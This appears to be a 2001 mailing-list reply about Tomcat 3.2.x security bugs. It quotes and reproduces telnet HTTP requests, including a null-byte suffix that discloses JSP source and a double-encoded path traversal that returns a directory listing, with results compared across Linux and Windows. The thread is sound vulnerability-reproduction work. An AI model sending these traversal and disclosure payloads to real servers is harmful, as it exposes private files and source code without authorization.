OK, I just tried this again (my results included inline) and in all cases I
get a 404 error. I'm using Win2000 and JDK1.2.2. I'll try testing with
JDK1.3 on Win2000 tomorrow and see if the problem follows the JDK version of
the operating system.
> -----Original Message-----
> From: Stephan Seyboth [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, April 04, 2001 9:08 AM
> To: [EMAIL PROTECTED]
> Subject: Re: TC3.2.x and security problems
>
[...]
>
> $ telnet localhost 8080
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
> Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
> Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [numguess.jsp source follows]
This one has been fixed in 3.2.2.
>
> $ telnet localhost 8180
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp%00
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
> Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
> Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [numguess.jsp source follows]
My results on Win2000 with JDK1.2.2
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 213
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java
1.2.2
; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)
<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /examples/jsp/num/numguess.jsp%00<br><br>
<b>Not found request:</b> /examples/jsp/num/numguess.jsp%00</body>
>
> $ telnet localhost 8180
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /%252e%252e/%252e%252e/%00.jsp
>
> HTTP/1.0 200 OK
> Content-Type: text/html;charset=ISO-8859-1
> Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
> Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [directory listing follows]
My results on Win2000 with JDK1.2.2.
GET /%252e%252e/%252e%252e/%00.jsp
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 207
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java
1.2.2
; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)
<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /%252e%252e/%252e%252e/%00.jsp<br><br>
<b>Not found request:</b> /%252e%252e/%252e%252e/%00.jsp</body>
I don't have JDK 1.3 on this machine so I'll have to wait until tomorrow to
see if the problem behavior follows the JDK version or the operating system.
